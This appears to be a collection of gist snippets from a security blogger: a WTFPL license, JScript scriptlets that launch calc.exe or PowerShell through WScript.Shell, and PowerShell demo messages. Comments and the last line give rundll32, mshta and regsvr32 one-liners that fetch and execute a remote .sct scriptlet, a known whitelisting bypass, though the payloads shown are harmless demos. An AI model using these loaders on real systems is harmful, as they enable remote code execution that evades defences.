agreenjay

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
                    Version 2, December 2004

 Copyright (C) 2011 YOUR_NAME_HERE <YOUR_URL_HERE>

 Everyone is permitted to copy and distribute verbatim or modified
 copies of this license document, and changing it is allowed as long
 as the name is changed.

            DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE

agreenjay

<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
    ![CDATA[        
     var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>

agreenjay

write-host "Watching GIF animations showing JavaScript malware launched from an ADS"
start-sleep -seconds 2
write-host "can be strangely compelling."
write-host -seconds 4
write-host "You'll want to watch this video over and over "
start-sleep -seconds 4
write-host "and over. And now you have an uncontrollabe urge to click the CTA."
start-sleep -seconds 3
write-host "The one that says Free Varonis Demo!"

agreenjay

write-host "Watching GIF animations showing JavaScript malware launched from an ADS"
start-sleep -seconds 4
write-host "can be strangely compelling."
start-sleep -seconds 4
write-host "You'll want to watch this video over and over "
start-sleep -seconds 5
write-host "and over. And now you have an uncontrollabe urge to click the CTA."
start-sleep -seconds 3
write-host "The one that says Free Varonis Demo!"

agreenjay

write-host "If you see this message, you have lots of security mitigation work ahead of you!"

agreenjay

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("echo If you see this message, you need to review your security. See blog.varonis.com for answers"); 
    ]]>
</script>

agreenjay

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
  
	var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop write-host");

agreenjay

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
        
        var r = new ActiveXObject("WScript.Shell").Run("powershell -noe write-host Booo!");

agreenjay

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
        window.alert("hello");
       

agreenjay

regsvr32 /s /n /u /i:https://gist.githubusercontent.com/agreenjay/c6cc5066b453b909f5ae0542504c1b6e/raw/c58b9f4fe3ac5251630a2948222cd8909e6ce1dc/scripty2.sct